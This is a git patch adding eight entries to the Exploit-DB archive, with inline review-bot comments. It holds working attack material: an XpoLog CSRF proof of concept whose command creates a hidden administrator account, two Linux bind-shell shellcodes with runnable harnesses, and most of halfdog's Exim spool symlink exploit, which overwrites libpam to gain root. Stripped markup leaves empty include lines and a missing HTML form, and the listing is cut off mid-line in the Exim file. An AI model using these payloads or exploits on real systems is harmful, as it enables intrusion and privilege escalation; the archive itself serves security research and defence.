From b530dd470e6d942edc294887448f81b2cf3cf523 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 5 Jul 2016 05:06:28 +0000
Subject: [PATCH] DB: 2016-07-05
8 new exploits
BigDump - (Cross Site Scripting/SQL Injection/Arbitrary File Upload) Multiple Vulnerabilities
BigDump 0.29b and 0.32b - Multiple Vulnerabilities
Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption
Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption
Debian Exim - Spool Local Root Privilege Escalation
Ubuntu 16.04 local root exploit - netfilter target_offset OOB
Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit
XpoLog Center 6 - Remote Command Execution CSRF
Ktools Photostore 4.7.5 - Multiple Vulnerabilities
Linux 64bit NetCat Bind Shell Shellcode - 64 bytes
WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities
Linux x86 TCP Bind Shell Port 4444 - 98 bytes
WebCalendar 1.2.7 - Multiple Vulnerabilities
eCardMAX 10.5 - Multiple Vulnerabilities
---
 files.csv | 14 +-
 platforms/jsp/webapps/40050.txt | 98 +++++++++
 platforms/lin_x86-64/shellcode/40052.c | 40 ++++
 platforms/lin_x86/shellcode/40056.c | 265 +++++++++++++++++++++++
 platforms/linux/local/40054.c | 280 +++++++++++++++++++++++++
 platforms/php/webapps/40051.txt | 99 +++++++++
 platforms/php/webapps/40055.py | 98 +++++++++
 platforms/php/webapps/40057.txt | 269 ++++++++++++++++++++++++
 platforms/php/webapps/40058.txt | 98 +++++++++
 9 files changed, 1258 insertions(+), 3 deletions(-)
 create mode 100755 platforms/jsp/webapps/40050.txt
 create mode 100755 platforms/lin_x86-64/shellcode/40052.c
 create mode 100755 platforms/lin_x86/shellcode/40056.c
 create mode 100755 platforms/linux/local/40054.c
 create mode 100755 platforms/php/webapps/40051.txt
 create mode 100755 platforms/php/webapps/40055.py
 create mode 100755 platforms/php/webapps/40057.txt
 create mode 100755 platforms/php/webapps/40058.txt
diff --git a/files.csv b/files.csv
index 38b69cee7..7c4090a46 100755
--- a/files.csv
+++ b/files.csv
@@ -34378,7 +34378,7 @@ id,file,description,date,author,platform,type,port
 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
 38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80
-38076,platforms/php/webapps/38076.txt,"BigDump - (Cross Site Scripting/SQL Injection/Arbitrary File Upload) Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
+38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
 38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
 38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
 38099,platforms/php/webapps/38099.txt,"TinyMCPUK 'test' Parameter Cross Site Scripting Vulnerability",2012-12-01,eidelweiss,php,webapps,0
@@ -35763,7 +35763,7 @@ id,file,description,date,author,platform,type,port
 39541,platforms/linux/dos/39541.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - mct_u232 Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
 39543,platforms/linux/dos/39543.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - cdc_acm Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
 39544,platforms/linux/dos/39544.txt,"Linux Kernel <= 3.10.0 (CentOS / RHEL 7.1) - aiptek Nullpointer Dereference",2016-03-09,"OpenSource Security",linux,dos,0
-39545,platforms/linux/dos/39545.txt,"Linux - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
+39545,platforms/linux/dos/39545.txt,"Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption",2016-03-09,"Google Security Research",linux,dos,0
 39546,platforms/windows/dos/39546.txt,"Nitro Pro <= 10.5.7.32 & Nitro Reader <= 5.5.3.1 - Heap Memory Corruption",2016-03-10,"Francis Provencher",windows,dos,0
 39547,platforms/php/webapps/39547.txt,"WordPress Best Web Soft Captcha Plugin <= 4.1.5 - Multiple Vulnerabilities",2016-03-10,"Colette Chamberland",php,webapps,80
 39548,platforms/php/webapps/39548.txt,"WordPress WP Advanced Comment Plugin 0.10 - Persistent XSS",2016-03-10,"Mohammad Khaleghi",php,webapps,80
@@ -36161,6 +36161,7 @@ id,file,description,date,author,platform,type,port
 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
 39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
+40054,platforms/linux/local/40054.c,"Debian Exim - Spool Local Root Privilege Escalation",2016-07-04,halfdog,linux,local,0
 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
 39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
 39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
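Review bot: The new `40054` row is inserted between `39974` and `39976`, out of id order, while the other seven new ids are appended after `40049` in the following hunk in ascending order; placing it between `40052` and `40055` there keeps `files.csv` sorted by id the way the surrounding rows are. Its date `2016-07-04` sitting next to the `2016-06-20` rows is what makes the misplacement visible.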
@@ -36220,4 +36221,11 @@ id,file,description,date,author,platform,type,port
 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - CSRF to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443
 40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
-40049,platforms/linux/local/40049.c,"Ubuntu 16.04 local root exploit - netfilter target_offset OOB",2016-07-03,vnik,linux,local,0
+40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit",2016-07-03,vnik,linux,local,0
+40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution CSRF",2016-07-04,LiquidWorm,jsp,webapps,30303
+40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80
+40052,platforms/lin_x86-64/shellcode/40052.c,"Linux 64bit NetCat Bind Shell Shellcode - 64 bytes",2016-07-04,CripSlick,lin_x86-64,shellcode,0
+40055,platforms/php/webapps/40055.py,"WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80
+40056,platforms/lin_x86/shellcode/40056.c,"Linux x86 TCP Bind Shell Port 4444 - 98 bytes",2016-07-04,sajith,lin_x86,shellcode,0
+40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80
+40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80
diff --git a/platforms/jsp/webapps/40050.txt b/platforms/jsp/webapps/40050.txt
new file mode 100755
index 000000000..35cc14261
--- /dev/null
+++ b/platforms/jsp/webapps/40050.txt
@@ -0,0 +1,98 @@ + +XpoLog Center V6 CSRF Remote Command Execution + + +Vendor: XpoLog LTD +Product web page: http://www.xpolog.com +Affected version: 6.4469 + 6.4254 + 6.4252 + 6.4250 + 6.4237 + 6.4235 + 5.4018 + +Summary: Applications Log Analysis and Management Platform. + +Desc: XpoLog suffers from arbitrary command execution. Attackers +can exploit this issue using the task tool feature and adding a +command with respected arguments to given binary for execution. +In combination with the CSRF an attacker can execute system commands +with SYSTEM privileges. + +Tested on: Apache-Coyote/1.1 + Microsoft Windows Server 2012 + Microsoft Windows 7 Professional SP1 EN 64bit + Java/1.7.0_45 + Java/1.8.0.91 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5335 +Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php + + +14.06.2016 + +-- + + +exePath = "C:\\windows\\system32\\cmd.exe" +exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add" + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
+--
+
+exePath = "C:\\windows\\system32\\cmd.exe"
+exeArgs = "/C whoami > c:\\Progra~1\\XpoLogCenter6\\defaultroot\\logeye\\testingus.txt"
+
+
+GET
+http://10.0.0.17:30303/logeye/testingus.txt
+
+Response:
+
+nt authority\system
diff --git a/platforms/lin_x86-64/shellcode/40052.c b/platforms/lin_x86-64/shellcode/40052.c
new file mode 100755
index 000000000..aeed81992
--- /dev/null
+++ b/platforms/lin_x86-64/shellcode/40052.c
@@ -0,0 +1,40 @@
+#include
+#include
+
+// Exploit Title: [NetCat Bind Shell 64bit 64byte]
+// Date: [6/28/2016]
+// Exploit Author: [CripSlick]
+// Tested on: [Kali 2.0]
+// Version: [v1.10-41]
+
+// ShepherdDowling@gmail.com
+// OffSec ID: OS-20614
+
+// Victim: netstat -an | grep LISTEN | grep tcp
+// Attacker: nc
+
+unsigned char code[] = \
+
+#define PORT "\x39\x39"
+// Keep to two bytes
+
+"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+;
+
+int main ()
+{
+ // I make sure there are no nulls
+ // The string count will terminate at the first \x00
+ printf("The Shellcode is %d Bytes Long\n", strlen(code));
+
+ // Next I throw 0xAAAAAAAA into every register before shellcode execution
+ // This ensures that the shellcode will run in any circumstance
+
+ __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
+ "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
+ "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
+ "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
+ "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
+ "call code");
+ return 0;
+}
diff --git a/platforms/lin_x86/shellcode/40056.c b/platforms/lin_x86/shellcode/40056.c
new file mode 100755
index 000000000..57922794d
--- /dev/null
+++ b/platforms/lin_x86/shellcode/40056.c
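Review bot: The advisory lists seven affected builds under `Affected version:` but gives no fixed version, vendor response or workaround, so a reader cannot tell whether 6.4469 is the last vulnerable build or the current one; a `Fix:` or `Status:` line after `Advisory URL:` would close that gap. The PoC between the two `exePath`/`exeArgs` pairs appears here only as a long run of empty added lines, which looks like the HTML form was stripped when the page was extracted rather than left out of the commit — confirm against the committed file. For detection, both PoCs leave concrete artefacts that the text does document: a task entry whose exePath is `cmd.exe`, and the file `testingus.txt` under the XpoLog defaultroot.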
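Review bot: `printf("The Shellcode is %d Bytes Long\n", strlen(code));` passes a `size_t` to `%d`; `%zu` is the matching conversion, and the `printf("Shellcode Length: %d\n", strlen(code));` line at the end of 40056.c has the same mismatch. The two `#include` lines and the `// Attacker: nc` line carry no header names or arguments in this rendering, in both this file and 40056.c, which looks like angle-bracketed text was dropped as HTML markup during extraction rather than missing from the commit — confirm against the committed file. The comment `// This ensures that the shellcode will run in any circumstance` overstates what the asm shows; `// Fill every general-purpose register with a sentinel so the test does not depend on prior register state` describes what it actually does.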
@@ -0,0 +1,265 @@ +/* +# Linux x86 TCP Bind Shell Port 4444 (98 bytes) +# Author: sajith +# Tested on: i686 GNU/Linux +# Shellcode Length: 98 +# SLAE - 750 + +------------c prog ---poc by sajith shetty---------- +#include +#include +#include +#include +#include + +int main(void) +{ + +int sock_file_des, clientfd; +struct sockaddr_in sock_ad; +//[1]we need to create the socket connection using socket call function + +//[*]Man page for socket call +//----->int socket(int domain, int type, int protocol); +// domain = AF_INET (IPv4 Internet protocol family which will be used for communication) +// type = SOCK_STREAM (Provides sequenced, reliable, two-way, connection-based byte streams. An out-of-band data transmission mechanism may be supported +// protocol = 0 (The protocol specifies a particular protocol to be used with the socket.Normally only a single protocol exists to support a particular socket type within a given protocol family, in which case protocol can be specified as 0. + +sock_file_des = socket(AF_INET, SOCK_STREAM, 0); +//[2]Binds the socket to localhost and port (here will use 4444) using bind call. + +//[*]Man page for bind call +//------->int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen); +// sockfd = sock_file_des +// const struct sockaddr *addr = (struct sockaddr *)&sock_ad (bind() assigns the address specified to by addr to the socket referred to by the file descriptor sockfd) +// socklen_t addrlen = sizeof(sock_ad) (addrlen specifies the size, in bytes, of the address structure pointed to by addr.) 
+ +sock_ad.sin_family = AF_INET; // Host byte order.(2) +sock_ad.sin_port = htons(4444);// network byte order +sock_ad.sin_addr.s_addr = INADDR_ANY;//(0)bindshell will listen on any address + +bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad)); + + +//[3]Waits for incoming connection using call to listen + +//[*]Man page for listen call +//------->int listen(int sockfd, int backlog); +// sockfd = sock_file_des (The sockfd argument is a file descriptor that refers to a socket of type SOCK_STREAM) +// backlog = 0 (The backlog argument defines the maximum length to which the queue of pending connections for sockfd may grow) + + +listen(sock_file_des, 0); + +//[4]Accept the connection using call to accept + +//[*]Man page to accept call +//------->int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); +// sockfd = sock_file_des +// struct sockaddr *addr = NULL (The argument addr is a pointer to a sockaddr structure. This structure is filled in with the address of the peer socket, as known to the communications layer.When addr is NULL, nothing is filled in; in this case, addrlen is not used, and should also be NULL. 
+// socklen_t *addrlen = NULL + + +clientfd = accept(sock_file_des, NULL, NULL); + +//[5]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2 + +//[*]Man page for dup2 (duplicate a file descriptor) +//------->int dup2(int oldfd, int newfd); +// oldfd = clientfd +// newfd = 0(stdin) , 1(stdout), 2(stderr) +dup2(clientfd, 0); // stdin +dup2(clientfd, 1); // stdout +dup2(clientfd, 2); // stderr + +//[6]Execute shell (here we use /bin/sh) using execve call + +//[*]Man page for execve call +//------->int execve(const char *filename, char *const argv[],char *const envp[]); +// char *filename = /bin/sh +// char *const argv[] = NULL +// char *const envp[] = NULL + +execve("/bin/sh",NULL,NULL); +} +----------------------end of c program-------------- + +global _start + +section .text + +_start: + +;syscall for socket +;cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep socket +;#define __NR_socketcall 102 (0x66 in hex) +;sock_file_des = socket(AF_INET, SOCK_STREAM, 0) +;AF_INET = 2 ( bits/socket.h) +;SOCK_STREAM = 1 (bits/socket.h) +;socket(2,1,0) +xor eax, eax ; zero out eax register using XOR operation +xor ebx, ebx ; zero out ebx register using XOR operation +push eax ; move 0 to stack (protocol=0) +mov al, 0x66 ; moves socket call number to al register +mov bl, 0x1 ; moves 0x1 to bl register +push ebx ; value in ebx=1 is pushed in to the stack (sock_stream =1) +push 0x2 ; value 0x2 is pushed onto stack (AF_INET=2) +mov ecx, esp ; save the pointer to args in ecx +int 0x80 ; socket() +mov esi, eax ; store sockfd in esi register + +;sock_ad.sin_addr.s_addr = INADDR_ANY;//0, bindshell will listen on any address +;sock_ad.sin_port = htons(4444);// port to bind.(4444) +;sock_ad.sin_family = AF_INET; // TCP protocol (2). 
+xor edx, edx ; zero out edx register using XOR operation +push edx ; push 0 on to stack (INADDR_ANY) +push word 0x5C11; htons(4444) +push word 0x2 ; AF_INET = 2 +mov ecx, esp ; save the pointer to args in ecx + +;bind(sock_file_des, (struct sockaddr *) &sock_ad, sizeof(sock_ad)); +;cat /usr/include/linux/net.h | grep bind +;bind = 2 + +mov al, 0x66 ; sys socket call +mov bl, 0x2 ; bind =2 +push 0x10 ; size of sock_ad (sizeof(sock_ad)) +push ecx ; struct pointer +push esi ; push sockfd (sock_file_des) onto stack +mov ecx, esp ; save the pointer to args in ecx +int 0x80 + + +;listen(sock_file_des, 0); +;cat /usr/include/linux/net.h | grep listen +; listen =4 + +mov al, 0x66 ; sys socket call +mov bl, 0x4 ; listen=4 +push edx ; push 0 onto stack (backlog=0) +push esi ; sockfd (sock_file_des ) +mov ecx, esp ; save the pointer to args in ecx +int 0x80 + +;clientfd = accept(sock_file_des, NULL, NULL) +;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen); +;cat /usr/include/linux/net.h | grep accept +; accept=5 + +mov al, 0x66 ; sys socket call +mov bl, 0x5 ; accept =5 +push edx ; null value socklen_t *addrlen +push edx ; null value sockaddr *addr +push esi ; sockfd (sock_file_des ) +mov ecx, esp ; save the pointer to args in ecx +int 0x80 + +;int dup2(int oldfd, int newfd); +;dup2(clientfd, 0); // stdin +;dup2(clientfd, 1); // stdout +;dup2(clientfd, 2); // stderr + +mov ebx, eax ;move client fd to ebx +xor ecx, ecx ; xor to clear out ecx +mov cl, 3 ; counter to loop 3 times + +loopinghere: + +mov al, 0x3f ; sys call for dup2 +int 0x80 +dec cl ; decrement till 0 +jns loopinghere ; loop as long sign flag is not set + +;Execute shell (here we use /bin/sh) using execve call +;execve("//bin/sh",["//bin/sh"]) + +mov al, 11 ; execve + push edx ; push null + push 0x68732f6e ; hs/b + push 0x69622f2f ; ib// + mov ebx,esp ; save pointer + push edx ; push null + push ebx ; push pointer + mov ecx,esp ; save pointer + int 0x80 +-------------obj dump------------ 
+finalcode: file format elf32-i386 + + +Disassembly of section .text: + +08048060 <_start>: + 8048060: 31 c0 xor eax,eax + 8048062: 31 db xor ebx,ebx + 8048064: 50 push eax + 8048065: b0 66 mov al,0x66 + 8048067: b3 01 mov bl,0x1 + 8048069: 53 push ebx + 804806a: 6a 02 push 0x2 + 804806c: 89 e1 mov ecx,esp + 804806e: cd 80 int 0x80 + 8048070: 89 c6 mov esi,eax + 8048072: 31 d2 xor edx,edx + 8048074: 52 push edx + 8048075: 66 68 11 5c pushw 0x5c11 + 8048079: 66 6a 02 pushw 0x2 + 804807c: 89 e1 mov ecx,esp + 804807e: b0 66 mov al,0x66 + 8048080: b3 02 mov bl,0x2 + 8048082: 6a 10 push 0x10 + 8048084: 51 push ecx + 8048085: 56 push esi + 8048086: 89 e1 mov ecx,esp + 8048088: cd 80 int 0x80 + 804808a: b0 66 mov al,0x66 + 804808c: b3 04 mov bl,0x4 + 804808e: 52 push edx + 804808f: 56 push esi + 8048090: 89 e1 mov ecx,esp + 8048092: cd 80 int 0x80 + 8048094: b0 66 mov al,0x66 + 8048096: b3 05 mov bl,0x5 + 8048098: 52 push edx + 8048099: 52 push edx + 804809a: 56 push esi + 804809b: 89 e1 mov ecx,esp + 804809d: cd 80 int 0x80 + 804809f: 89 c3 mov ebx,eax + 80480a1: 31 c9 xor ecx,ecx + 80480a3: b1 03 mov cl,0x3 + +080480a5 : + 80480a5: b0 3f mov al,0x3f + 80480a7: cd 80 int 0x80 + 80480a9: fe c9 dec cl + 80480ab: 79 f8 jns 80480a5 + 80480ad: b0 0b mov al,0xb + 80480af: 52 push edx + 80480b0: 68 6e 2f 73 68 push 0x68732f6e + 80480b5: 68 2f 2f 62 69 push 0x69622f2f + 80480ba: 89 e3 mov ebx,esp + 80480bc: 52 push edx + 80480bd: 53 push ebx + 80480be: 89 e1 mov ecx,esp + 80480c0: cd 80 int 0x80 + +----------------------------------------------- +gcc -fno-stack-protector -z execstack shellcode.c -o shellcode +*/ + +#include +#include + +unsigned char code[] = \ + +"\x31\xc0\x31\xdb\x50\xb0\x66\xb3\x01\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x31\xd2\x52\x66\x68" +"\x11\x5c" // port number 4444 
+"\x66\x6a\x02\x89\xe1\xb0\x66\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80"; + + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); +int (*ret)() = (int(*)())code; +ret(); +} \ No newline at end of file diff --git a/platforms/linux/local/40054.c b/platforms/linux/local/40054.c new file mode 100755 index 000000000..ec9b5622a --- /dev/null +++ b/platforms/linux/local/40054.c 
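Review bot: `main()` at the end of the file declares no return type and relies on implicit `int`, which C99 removed; `int main(void)` is the portable spelling, and the `int (*ret)()` cast on the next line would then be the only K&R-style declaration left. The header's `Shellcode Length: 98` does agree with the byte string (23 + 2 + 73 bytes) and with the objdump listing, whose last two-byte instruction sits at `80480c0`, so that documented figure checks out. The `080480a5 :` label in the listing has lost its symbol name in this rendering, most likely the same markup-stripping seen on the `#include` lines.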
@@ -0,0 +1,280 @@ +/* +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA512 + +Hello List, + +This is just a minor issue in Exim, no replies so far, so publication +should be OK. + +Introduction: +============ +Exim4 in some variants is started as root but switches to uid/gid +Debian-exim/Debian-exim. But as Exim might need to store received +messages in user mailboxes, it has to have the ability to regain +privileges. This is also true when Exim is started as "sendmail". +During internal operation, sendmail (Exim) will manipulate message +spool files in directory structures owned by user "Debian-exim" +without caring about symlink attacks. Thus execution of code as +user "Debian-exim" can be used to gain root privileges by invoking +"sendmail" as user "Debian-exim". + + +POC: +=== +http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/EximUpgrade.c +demonstrates the issue using a ELF file being both executable +and shared library which is invoked multiple times by different +processes. + + +Results, Discussion: +=================== +As Exim4 process itself is already quite privileged - it has to +access the user mailboxes with different UIDs anyway - the having +such problems is expectable and explainable. A change in documentation +might make sense, to indicate, that the special user "Debian-exim" +is only intended to mark files being used by the daemon, but not +to provide root/daemon user privilege separation. + +Even without this vulnerability, a "Debian-exim" process could +use http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ +to escalate to "adm" group, which again makes it very likely to +use "syslog", "apache" or other components to escalate to root +via "/var/log". This is annoying, perhaps this should get a CVE +to make daemon-to-root escalations harder in general. 
+ + +Timeline: +======== +20160605: Discovery, report Debian security +20160607: Writeup +20160611: Also verified in Ubuntu, https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/ +20160630: Publication + + +References: +========== +* http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/ +* http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ +* https://bugs.launchpad.net/ubuntu/+source/exim4/+bug/1580454/ +-----BEGIN PGP SIGNATURE----- + +iEYEAREKAAYFAld0lPUACgkQxFmThv7tq+5MeACePVuh5CppGyhUudMfK7kjDXjj +8mcAn2AcZFVEwUKSHadffJJyCNLP0X7H +=4IJk +-----END PGP SIGNATURE----- + + * This software is provided by the copyright owner "as is" and any + * expressed or implied warranties, including, but not limited to, + * the implied warranties of merchantability and fitness for a particular + * purpose are disclaimed. In no event shall the copyright owner be + * liable for any direct, indirect, incidential, special, exemplary or + * consequential damages, including, but not limited to, procurement + * of substitute goods or services, loss of use, data or profits or + * business interruption, however caused and on any theory of liability, + * whether in contract, strict liability, or tort, including negligence + * or otherwise, arising in any way out of the use of this software, + * even if advised of the possibility of such damage. + * + * Copyright (c) 2016 halfdog + * See http://www.halfdog.net/Security/2016/DebianEximSpoolLocalRoot/ + * for more information. 
+ * + * Compile: gcc -fPIC -shared -Xlinker -init=_libInit -Xlinker '--soname=LIBPAM_1.0' -Xlinker --default-symver -o EximUpgrade EximUpgrade.c -Wl,-e_entry + * Use: Run as "Debian-exim": ./EximUpgrade --Upgrade + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define UPGRADE_FILE_NAME "/var/spool/exim4/EximUpgrade" +#define UPGRADE_LIB_DIR "/var/spool/exim4" + +#define TARGET_PATH "/lib/x86_64-linux-gnu/libpam.so.0.83.1" + +extern char **environ; + +#if defined(__x86_64__) +const char lib_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; +#define init_args(argc, argv) __asm__ volatile ( \ + "mov 0x8(%%rbp), %%edx \n\tmov %%edx, %0 \n\tlea 0x10(%%rbp), %1 \n\t" \ + :"=m"(argc), "=r"(argv)::"memory") +#endif /* __x86_64__ */ + + +/** Library initialization function, called by the linker. If not + * named _init, parameter has to be set during linking using -init=name + */ +extern void _libInit() { + if(geteuid()!=0) return; + int result=chown(UPGRADE_FILE_NAME, 0, 0); + assert(!result); + result=chmod(UPGRADE_FILE_NAME, 04755); + assert(!result); + exit(0); +} + +extern void _entry (void) { + int argc=0; + char **argv = NULL; + init_args(argc, argv); + int result=main(argc, argv); + exit(result); +} + +extern void pam_start() {} +extern void pam_set_item() {} +extern void pam_chauthtok() {} +extern void pam_end() {} +extern void pam_strerror() {} +extern void pam_getenvlist() {} +extern void pam_open_session() {} +extern void pam_close_session() {} +extern void pam_get_item() {} +extern void pam_acct_mgmt() {} +extern void pam_setcred() {} +extern void pam_authenticate() {} + + +int main(int argc, char **argv) { + DIR *dirStruct; + struct dirent *dirEnt; + char linkPath[1024]; + int result; + + assert(argc>1); + if(!strcmp(argv[1], "--Exec")) { + setresgid(0, 0, 0); + setresuid(0, 0, 0); + execve(argv[2], argv+2, environ); + fprintf(stderr, "Exec failed\n"); + 
return(1); + } + + if(!strcmp(argv[1], "--Repair")) { + int targetFd=open(TARGET_PATH, O_RDWR); + assert(targetFd>=0); + result=chown(TARGET_PATH, atoi(argv[2]), atoi(argv[3])); + assert(!result); + chmod(TARGET_PATH, atoi(argv[4])); + return(0); + } + + if(!strcmp(argv[1], "--Upgrade")) { + struct stat origStatData; + stat(TARGET_PATH, &origStatData); + + char *execArgs[6]; + int childPid=fork(); + if(!childPid) { + int inputFd=open("/dev/null", O_RDONLY); + dup2(inputFd, 0); + execArgs[0]="/usr/sbin/sendmail"; + execArgs[1]="root@localhost"; + execArgs[2]=NULL; + result=execve(execArgs[0], execArgs, environ); + assert(!result); + return(0); + } + + strcpy(linkPath, "/var/spool/exim4/input/xxxxxx-xxxxxx-xx-J"); + dirStruct=opendir("/var/spool/exim4/msglog"); + assert(dirStruct); + result=1; + while(result) { + while((dirEnt=readdir(dirStruct))) { + if(*dirEnt->d_name=='.') continue; +// Be fast, perhaps aligned word copy needed. Pray to 23 in demo. + strncpy(linkPath+23, dirEnt->d_name, 16); + result=symlink(TARGET_PATH, linkPath); + assert(!result); + fprintf(stderr, "Relinked %s\n", linkPath); + break; + } + rewinddir(dirStruct); + } + closedir(dirStruct); + while(1) { + struct stat currentStatData; + stat(TARGET_PATH, ¤tStatData); + if(currentStatData.st_uid!=origStatData.st_uid) break; + sleep(1); + } + waitpid(childPid, NULL, 0); + + fprintf(stderr, "Target ready for writing\n"); + int targetFd=open(TARGET_PATH, O_RDWR); + assert(targetFd>=0); + char *origData=(char*)malloc(origStatData.st_size); + result=read(targetFd, origData, origStatData.st_size); + assert(result==origStatData.st_size); + + struct stat newStatData; + stat(UPGRADE_FILE_NAME, &newStatData); + char *newData=(char*)malloc(newStatData.st_size); + int selfFd=open(UPGRADE_FILE_NAME, O_RDONLY); + result=read(selfFd, newData, newStatData.st_size); + assert(result==newStatData.st_size); + close(selfFd); + + ftruncate(targetFd, 0); + lseek(targetFd, 0, SEEK_SET); + result=write(targetFd, newData, 
